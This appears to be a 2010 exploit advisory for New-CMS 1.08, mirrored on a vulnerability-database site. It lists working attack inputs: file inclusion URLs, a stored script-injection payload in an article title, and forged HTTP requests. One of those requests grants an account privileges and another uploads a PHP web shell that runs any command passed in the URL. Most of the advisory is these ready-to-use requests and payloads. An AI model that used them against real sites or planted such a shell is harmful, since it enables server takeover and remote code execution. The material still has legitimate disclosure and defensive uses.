Lucene search
K

New-CMS 1.08 LFI / XSS / XSRF / Shell Upload

🗓️ 19 Feb 2010 00:00:00Reported by Alberto FontanellaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

New-CMS 1.08 LFI, XSS, XSRF, Shell Upload, Full Path Disclosure, Persistent XSS, XSR

Code
`#  
#  
# Multiple Vulnerability in New-CMS  
#  
# [Vendor SW]: New-CMS  
# [Version]: 1.08 (but possible all versions)  
# [Vendor URL]: www.new-cms.org  
# [Tested on]: Ubuntu Server 9.10  
# [Category]: Webapps/0day   
#  
# [Date]: 17 Feb 2010  
# [Author]: Alberto "fulgur" Fontanella  
# [Author URL]: ictsec.wordpress.com  
# [Author EMAIL]: itsicurezza<0x40>yahoo.it  
#  
#  
  
  
[ 1 ] - [ Full Path Disclosure ]  
  
http://[host]/struttura/ricerca.php  
http://[host]/pdf.php  
http://[host]/index.php?lng=it&pg=manager  
...etc  
  
Fatal error: Call to undefined function ListaFile() in  
/var/www/struttura/ricerca.php on line 8  
  
  
[ 2 ] - [ Local File Inclusion ]  
  
http://[host]/index.php?pg=cmd  
  
You have to put cmd.php in /struttura/  
  
http://[host]/pdf.php?lng=cmd.php  
http://[host]/newcms/struttura/manager.php?lng=cmd.php  
http://[host]/newcms/struttura/editor/quote.php?lng=cmd.php  
...etc  
  
You have to put cmd.php.str in /lingue/  
  
  
[ 3 ] - [ Persistent XSS ]  
  
Write an Article/News and Put in the Title field:  
  
"><script>alert(1)</script>  
  
  
  
[ 4 ] - [ XSRF ]  
  
To give privileges to an User Account:  
  
POST /index.php?lng=it&pg=admin&s=redattori HTTP/1.1  
Host: [host]  
Keep-Alive: 300  
Connection: keep-alive  
Referer: http://[host]/index.php?lng=it&pg=admin&s=redattori  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 64  
  
azione=new&add_red=Haxor&opt1=on&opt2=on&opt3=on&opt4=on&opt5=on  
  
To upload a PHP Shell:  
  
POST /struttura/manager.php?lng=it&upload=ok&id=indirizzo_0 HTTP/1.1  
Host: [host]  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 300  
Connection: keep-alive  
Referer: http://[host]/struttura/manager.php?lng=it&id=indirizzo_0  
Content-Type: multipart/form-data;  
boundary=---------------------------213917452311081853951240913053  
Content-Length: 424  
  
-----------------------------213917452311081853951240913053  
Content-Disposition: form-data; name="radice"  
Content-Disposition: form-data; name="per"  
  
  
-----------------------------213917452311081853951240913053  
Content-Disposition: form-data; name="file"; filename="cmd9.php"  
Content-Type: application/x-httpd-php  
  
<?php  
system($_GET['cmd']);  
?>  
  
-----------------------------213917452311081853951240913053--  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation